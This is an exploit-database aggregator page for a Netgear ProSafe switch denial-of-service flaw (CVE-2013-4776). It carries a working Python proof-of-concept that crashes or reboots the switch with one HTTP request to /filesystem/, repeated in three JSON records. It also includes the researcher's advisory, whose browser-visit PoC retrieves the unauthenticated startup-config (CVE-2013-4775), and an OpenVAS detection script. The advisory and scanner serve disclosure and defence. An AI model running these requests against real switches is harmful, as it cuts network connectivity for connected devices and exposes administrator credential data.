Search...

Netgear ProSafe - Denial of Service Vulnerability

2013-08-22T00:00:00

ID EDB-ID:27775
Type exploitdb
Reporter Juan J. Guelfo
Modified 2013-08-22T00:00:00

Description

Netgear ProSafe - Denial of Service Vulnerability. CVE-2013-4776. Dos exploit for hardware platform

                                        
                                            #!/usr/bin/python

################################################################
#                                                              #
# Netgear ProSafe - CVE-2013-4776 PoC                          #
# written by Juan J. Guelfo @ Encripto AS                      #
# post@encripto.no                                             #
#                                                              #
# Copyright 2013 Encripto AS. All rights reserved.             #
#                                                              #
# This software is licensed under the FreeBSD license.         #
# http://www.encripto.no/tools/license.php                     #
#                                                              #
################################################################

import sys, getopt, urllib2
from subprocess import *


__version__ = "0.1"
__author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)"


# Prints title and other header info
def header():
    print ""
    print " ================================================================= "
    print "|  Netgear ProSafe - CVE-2013-4776 PoC \t\t\t\t  |".format(__version__)
    print "|  by {0}\t\t  |".format(__author__)
    print " ================================================================= "
    print ""

    
# Prints help    
def help():
    header()
    print """
   Usage: python CVE-2013-4776.py [mandatory options]

   Mandatory options:
       -t target               ...Target IP address
       -p port                 ...Port where the HTTP admin interface is listening on
        
   Example:
       python CVE-2013-4776.py -t 192.168.0.1 -p 80
    """
    sys.exit(0) 

    
if __name__ == '__main__':
    
    #Parse options
    try:
        options, args = getopt.getopt(sys.argv[1:], "t:p:", ["target=", "port="])

    except getopt.GetoptError, err:
        header()
        print "\n[-] Error: {0}.\n".format(str(err))
        sys.exit(1)
    
    if not options:
        help()
    
    target = None
    port = None
    for opt, arg in options:
        if opt in ("-t"):
            target = arg
        
        if opt in ("-p"):
            port = arg    
            
    #Option input validation
    if not target or not port:
        help()
        print "[-] Error: Incorrect syntax.\n"
        sys.exit(1)
    
    header()
    headers = { "User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" }

    try:
        # Get the startup config via HTTP admin interface
        print "[+] Triggering DoS condition..."
        r = urllib2.Request('http://%s:%s/filesystem/' % (target, port), None, headers)
        urllib2.urlopen(r,"",5).read()
    
    except urllib2.URLError:
        print "[-] Error: The connection could not be established.\n"
        
    except:
        print "[+] The switch should be freaking out..."
        print "[+] Reboot the switch (unplug the power cord) to get it back to normal...\n"

    sys.exit(0)

JSON Vulners Source

Initial Source

{"id": "EDB-ID:27775", "hash": "a4b28947a888fa71c7545ea3b49aa5f5", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Netgear ProSafe - Denial of Service Vulnerability", "description": "Netgear ProSafe - Denial of Service Vulnerability. CVE-2013-4776. Dos exploit for hardware platform", "published": "2013-08-22T00:00:00", "modified": "2013-08-22T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/27775/", "reporter": "Juan J. Guelfo", "references": [], "cvelist": ["CVE-2013-4776"], "lastseen": "2016-02-03T06:41:51", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2016-02-03T06:41:51"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-4776"]}, {"type": "seebug", "idList": ["SSV:81367"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29926", "SECURITYVULNS:VULN:13356"]}, {"type": "zdt", "idList": ["1337DAY-ID-21150"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103773"]}], "modified": "2016-02-03T06:41:51"}, "vulnersScore": 5.4}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/27775/", "sourceData": "#!/usr/bin/python\r\n\r\n################################################################\r\n# #\r\n# Netgear ProSafe - CVE-2013-4776 PoC #\r\n# written by Juan J. Guelfo @ Encripto AS #\r\n# post@encripto.no #\r\n# #\r\n# Copyright 2013 Encripto AS. All rights reserved. #\r\n# #\r\n# This software is licensed under the FreeBSD license. #\r\n# http://www.encripto.no/tools/license.php #\r\n# #\r\n################################################################\r\n\r\nimport sys, getopt, urllib2\r\nfrom subprocess import *\r\n\r\n\r\n__version__ = \"0.1\"\r\n__author__ = \"Juan J. Guelfo, Encripto AS (post@encripto.no)\"\r\n\r\n\r\n# Prints title and other header info\r\ndef header():\r\n print \"\"\r\n print \" ================================================================= \"\r\n print \"| Netgear ProSafe - CVE-2013-4776 PoC \\t\\t\\t\\t |\".format(__version__)\r\n print \"| by {0}\\t\\t |\".format(__author__)\r\n print \" ================================================================= \"\r\n print \"\"\r\n\r\n \r\n# Prints help \r\ndef help():\r\n header()\r\n print \"\"\"\r\n Usage: python CVE-2013-4776.py [mandatory options]\r\n\r\n Mandatory options:\r\n -t target ...Target IP address\r\n -p port ...Port where the HTTP admin interface is listening on\r\n \r\n Example:\r\n python CVE-2013-4776.py -t 192.168.0.1 -p 80\r\n \"\"\"\r\n sys.exit(0) \r\n\r\n \r\nif __name__ == '__main__':\r\n \r\n #Parse options\r\n try:\r\n options, args = getopt.getopt(sys.argv[1:], \"t:p:\", [\"target=\", \"port=\"])\r\n\r\n except getopt.GetoptError, err:\r\n header()\r\n print \"\\n[-] Error: {0}.\\n\".format(str(err))\r\n sys.exit(1)\r\n \r\n if not options:\r\n help()\r\n \r\n target = None\r\n port = None\r\n for opt, arg in options:\r\n if opt in (\"-t\"):\r\n target = arg\r\n \r\n if opt in (\"-p\"):\r\n port = arg \r\n \r\n #Option input validation\r\n if not target or not port:\r\n help()\r\n print \"[-] Error: Incorrect syntax.\\n\"\r\n sys.exit(1)\r\n \r\n header()\r\n headers = { \"User-Agent\" : \"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)\" }\r\n\r\n try:\r\n # Get the startup config via HTTP admin interface\r\n print \"[+] Triggering DoS condition...\"\r\n r = urllib2.Request('http://%s:%s/filesystem/' % (target, port), None, headers)\r\n urllib2.urlopen(r,\"\",5).read()\r\n \r\n except urllib2.URLError:\r\n print \"[-] Error: The connection could not be established.\\n\"\r\n \r\n except:\r\n print \"[+] The switch should be freaking out...\"\r\n print \"[+] Reboot the switch (unplug the power cord) to get it back to normal...\\n\"\r\n\r\n sys.exit(0)\r\n", "osvdbidlist": ["96477"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:13:05", "bulletinFamily": "NVD", "description": "NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem/.", "modified": "2013-12-19T18:07:00", "id": "CVE-2013-4776", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4776", "published": "2013-12-19T04:24:00", "title": "CVE-2013-4776", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "seebug": [{"lastseen": "2017-11-19T16:55:53", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-81367", "id": "SSV:81367", "title": "Netgear ProSafe - Denial of Service Vulnerability", "type": "seebug", "sourceData": "\n #!/usr/bin/python\r\n\r\n################################################################\r\n# #\r\n# Netgear ProSafe - CVE-2013-4776 PoC #\r\n# written by Juan J. Guelfo @ Encripto AS #\r\n# post@encripto.no #\r\n# #\r\n# Copyright 2013 Encripto AS. All rights reserved. #\r\n# #\r\n# This software is licensed under the FreeBSD license. #\r\n# http://www.encripto.no/tools/license.php #\r\n# #\r\n################################################################\r\n\r\nimport sys, getopt, urllib2\r\nfrom subprocess import *\r\n\r\n\r\n__version__ = "0.1"\r\n__author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)"\r\n\r\n\r\n# Prints title and other header info\r\ndef header():\r\n print ""\r\n print " ================================================================= "\r\n print "| Netgear ProSafe - CVE-2013-4776 PoC \\t\\t\\t\\t |".format(__version__)\r\n print "| by {0}\\t\\t |".format(__author__)\r\n print " ================================================================= "\r\n print ""\r\n\r\n \r\n# Prints help \r\ndef help():\r\n header()\r\n print """\r\n Usage: python CVE-2013-4776.py [mandatory options]\r\n\r\n Mandatory options:\r\n -t target ...Target IP address\r\n -p port ...Port where the HTTP admin interface is listening on\r\n \r\n Example:\r\n python CVE-2013-4776.py -t 192.168.0.1 -p 80\r\n """\r\n sys.exit(0) \r\n\r\n \r\nif __name__ == '__main__':\r\n \r\n #Parse options\r\n try:\r\n options, args = getopt.getopt(sys.argv[1:], "t:p:", ["target=", "port="])\r\n\r\n except getopt.GetoptError, err:\r\n header()\r\n print "\\n[-] Error: {0}.\\n".format(str(err))\r\n sys.exit(1)\r\n \r\n if not options:\r\n help()\r\n \r\n target = None\r\n port = None\r\n for opt, arg in options:\r\n if opt in ("-t"):\r\n target = arg\r\n \r\n if opt in ("-p"):\r\n port = arg \r\n \r\n #Option input validation\r\n if not target or not port:\r\n help()\r\n print "[-] Error: Incorrect syntax.\\n"\r\n sys.exit(1)\r\n \r\n header()\r\n headers = { "User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" }\r\n\r\n try:\r\n # Get the startup config via HTTP admin interface\r\n print "[+] Triggering DoS condition..."\r\n r = urllib2.Request('http://%s:%s/filesystem/' % (target, port), None, headers)\r\n urllib2.urlopen(r,"",5).read()\r\n \r\n except urllib2.URLError:\r\n print "[-] Error: The connection could not be established.\\n"\r\n \r\n except:\r\n print "[+] The switch should be freaking out..."\r\n print "[+] Reboot the switch (unplug the power cord) to get it back to normal...\\n"\r\n\r\n sys.exit(0)\r\n\n ", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-81367"}], "zdt": [{"lastseen": "2018-02-18T01:33:04", "bulletinFamily": "exploit", "description": "Netgear ProSafe switches suffer from denial of service and unauthenticated startup-config disclosure vulnerabilities.", "modified": "2013-08-22T00:00:00", "published": "2013-08-22T00:00:00", "id": "1337DAY-ID-21150", "href": "https://0day.today/exploit/description/21150", "type": "zdt", "title": "Netgear ProSafe - Denial of Service Vulnerability", "sourceData": "import sys, getopt, urllib2\r\nfrom subprocess import *\r\n \r\n \r\n__version__ = \"0.1\"\r\n__author__ = \"Juan J. Guelfo, Encripto AS ([email\u00a0protected])\"\r\n \r\n \r\n# Prints title and other header info\r\ndef header():\r\n print \"\"\r\n print \" ================================================================= \"\r\n print \"| Netgear ProSafe - CVE-2013-4776 PoC \\t\\t\\t\\t |\".format(__version__)\r\n print \"| by {0}\\t\\t |\".format(__author__)\r\n print \" ================================================================= \"\r\n print \"\"\r\n \r\n \r\n# Prints help \r\ndef help():\r\n header()\r\n print \"\"\"\r\n Usage: python CVE-2013-4776.py [mandatory options]\r\n \r\n Mandatory options:\r\n -t target ...Target IP address\r\n -p port ...Port where the HTTP admin interface is listening on\r\n \r\n Example:\r\n python CVE-2013-4776.py -t 192.168.0.1 -p 80\r\n \"\"\"\r\n sys.exit(0) \r\n \r\n \r\nif __name__ == '__main__':\r\n \r\n #Parse options\r\n try:\r\n options, args = getopt.getopt(sys.argv[1:], \"t:p:\", [\"target=\", \"port=\"])\r\n \r\n except getopt.GetoptError, err:\r\n header()\r\n print \"\\n[-] Error: {0}.\\n\".format(str(err))\r\n sys.exit(1)\r\n \r\n if not options:\r\n help()\r\n \r\n target = None\r\n port = None\r\n for opt, arg in options:\r\n if opt in (\"-t\"):\r\n target = arg\r\n \r\n if opt in (\"-p\"):\r\n port = arg \r\n \r\n #Option input validation\r\n if not target or not port:\r\n help()\r\n print \"[-] Error: Incorrect syntax.\\n\"\r\n sys.exit(1)\r\n \r\n header()\r\n headers = { \"User-Agent\" : \"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)\" }\r\n \r\n try:\r\n # Get the startup config via HTTP admin interface\r\n print \"[+] Triggering DoS condition...\"\r\n r = urllib2.Request('http://%s:%s/filesystem/' % (target, port), None, headers)\r\n urllib2.urlopen(r,\"\",5).read()\r\n \r\n except urllib2.URLError:\r\n print \"[-] Error: The connection could not be established.\\n\"\r\n \r\n except:\r\n print \"[+] The switch should be freaking out...\"\r\n print \"[+] Reboot the switch (unplug the power cord) to get it back to normal...\\n\"\r\n \r\n sys.exit(0)\n\n# 0day.today [2018-02-17] #", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/21150"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:49", "bulletinFamily": "software", "description": "\r\n\r\n1. BACKGROUND\r\n\r\nAccording to the vendor, Netgear ProSafe is a cost-effective line of smart switches for Small and Medium Businesses (SMBs). The products cover an essential set of network features and easy-to-use web-based management. Power over Ethernet (PoE) and Stacking versions are also available.\r\n\r\n\r\n2. SUMMARY\r\n\r\nA range of ProSafe switches are affected by two different vulnerabilities:\r\nCVE-2013-4775: Unauthenticated startup-config disclosure.\r\nCVE-2013-4776: Denial of Service vulnerability.\r\n\r\n\r\n3. AFFECTED PRODUCTS AND SOFTWARE\r\n\r\nCVE-2013-4775\r\n\r\nGS724Tv3 and GS716Tv2 - firmware 5.4.1.13\r\nGS724Tv3 and GS716Tv2 - firmware 5.4.1.10\r\nGS748Tv4 - firmware 5.4.1.14\r\nGS510TP - firmware 5.4.0.6\r\nGS752TPS and GS728TPS - firmware 5.3.0.17\r\nGS728TS and GS725TS - firmware 5.3.0.17\r\nGS752TXS and GS728TXS - firmware 6.1.0.12\r\n\r\n\r\nCVE-2013-4776\r\n\r\nGS724Tv3 and GS716Tv2 - firmware 5.4.1.13\r\nGS724Tv3 and GS716Tv2 - firmware 5.4.1.10\r\nGS748Tv4 - firmware 5.4.1.14\r\nGS510TP - firmware 5.0.4.4\r\n\r\n\r\n4. VULNERABILITIES\r\n\r\nThe list below describes the vulnerabilities discovered in the affected software.\r\n\r\n\r\n4.1 CVE-2013-4775: Unauthenticated startup-config disclosure\r\n\r\nThe web management application fails to restrict URL access to different application areas.\r\nRemote, unauthenticated attackers could exploit this issue to download the device\u2019s startup-config, \r\nwhich contains administrator credentials in encrypted form.\r\n\r\n[Proof of Concept]\r\nThe vulnerability can be exploited with a simple HTTP (GET) request.\r\nOpen a browser and visit http://Target-IP/filesystem/startup-config\r\n\r\n\r\n4.2 CVE-2013-4776: Denial of Service vulnerability\r\n\r\nThe affected products are prone to a Denial of Service vulnerability. Remote, unauthenticated\r\nattackers could exploit this issue to cause a switch reboot or crash, resulting in a loss of\r\nnetwork connectivity for all devices connected to the switch.\r\n\r\n[Proof of Concept]\r\nThe vulnerability can be exploited with a simple HTTP (GET) request.\r\nOpen a browser and visit http://Target-IP/filesystem/\r\n\r\n\r\nImplementation of a Proof of Concept for both vulnerabilities can be found here:\r\nhttp://www.encripto.no/tools/netgear-prosafe-PoC.tar.gz\r\n\r\n\r\n5. REMEDIATION\r\n\r\nNo firmware updates or fixes have been released yet.\r\nAs a mitigation, the vendor recommends configuring a separate management VLAN and configure\r\naccess control via \u201cSecurity::Access::Access Control\u201d or \u201cSecurity::ACL::Advanced::IP Extended Rules\u201d.\r\n\r\n\r\n6. CREDIT\r\n\r\nThe vulnerabilities were originally discovered in a GS724Tv3 device, by Juan J. G\u044celfo at Encripto AS.\r\nE-mail: post [at] encripto [dot] no\r\nWeb: http://www.encripto.no\r\n\r\n\r\nSpecial thanks to Maarten Hoogcarspel and the Netgear Support Team for verifying other switch\r\nmodels, and considering possible fixes.\r\n\r\nFor more information about Encripto\u2019s research policy, please visit http://www.encripto.no/forskning/\r\n\r\n\r\n7. REFERENCES\r\n\r\nhttp://www.encripto.no/forskning/whitepapers/Netgear_prosafe_advisory_aug_2013.pdf\r\nhttp://www.encripto.no/tools/netgear-prosafe-PoC.tar.gz\r\n\r\n \r\nDISCLAIMER\r\n\r\nThe material presented in this document is for educational purposes only. Encripto AS cannot be\r\nresponsible for any loss or damage carried out by any technique presented in this material. The reader is\r\nthe only one responsible for applying this knowledge, which is at his / her own risk.\r\nAny of the trademarks, service marks, collective marks, design rights, personality rights or similar rights\r\nthat are mentioned, used or cited in this document is property of their respective owners.\r\n\r\n", "modified": "2013-10-09T00:00:00", "published": "2013-10-09T00:00:00", "id": "SECURITYVULNS:DOC:29926", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29926", "title": "Netgear ProSafe switches: Unauthenticated startup-config disclosure and Denial of Service", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:53", "bulletinFamily": "software", "description": "Information leakage, DoS.", "modified": "2013-10-09T00:00:00", "published": "2013-10-09T00:00:00", "id": "SECURITYVULNS:VULN:13356", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13356", "title": "Netgear ProSafe switches security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2019-11-13T20:22:40", "bulletinFamily": "scanner", "description": "Multiple NetGear ProSafe switches are prone to an information-\ndisclosure vulnerability.", "modified": "2019-11-12T00:00:00", "published": "2013-08-22T00:00:00", "id": "OPENVAS:1361412562310103773", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103773", "title": "Multiple NetGear ProSafe Switches Information Disclosure Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Multiple NetGear ProSafe Switches Information Disclosure Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103773\");\n script_bugtraq_id(61918);\n script_cve_id(\"CVE-2013-4775\", \"CVE-2013-4776\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_version(\"2019-11-12T09:49:27+0000\");\n\n script_name(\"Multiple NetGear ProSafe Switches Information Disclosure Vulnerability\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/61918\");\n script_xref(name:\"URL\", value:\"http://www.netgear.com\");\n\n script_tag(name:\"last_modification\", value:\"2019-11-12 09:49:27 +0000 (Tue, 12 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2013-08-22 12:52:30 +0200 (Thu, 22 Aug 2013)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to download configuration file and\ndisclose sensitive information. Information obtained may aid in\nfurther attacks.\");\n script_tag(name:\"vuldetect\", value:\"Try to read /filesystem/startup-config with a HTTP GET request and check the response.\");\n script_tag(name:\"insight\", value:\"The web management application fails to restrict URL access to differenti\napplication areas. Remote, unauthenticated attackers could exploit this issue to\ndownload the device's startup-config, which contains administrator credentials in\nencrypted form.\");\n script_tag(name:\"solution\", value:\"Ask the Vendor for an update.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Multiple NetGear ProSafe switches are prone to an information-\ndisclosure vulnerability.\");\n script_tag(name:\"affected\", value:\"GS724Tv3 and GS716Tv2 - firmware 5.4.1.13\n\nGS724Tv3 and GS716Tv2 - firmware 5.4.1.10\n\nGS748Tv4 - firmware 5.4.1.14\n\nGS510TP - firmware 5.4.0.6\n\nGS752TPS and GS728TPS - firmware 5.3.0.17\n\nGS728TS and GS725TS - firmware 5.3.0.17\n\nGS752TXS and GS728TXS - firmware 6.1.0.12\");\n\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\nurl = \"/\";\n\nif(http_vuln_check(port:port, url:url,pattern:\"<TITLE>NETGEAR\", usecache:TRUE)) {\n\n url = '/filesystem/startup-config';\n if(http_vuln_check(port:port, url:url,pattern:\"Current Configuration\", extra_check:make_list(\"System Description\",\"System Software Version\",\"network parms\"))) {\n security_message(port:port);\n exit(0);\n }\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}]}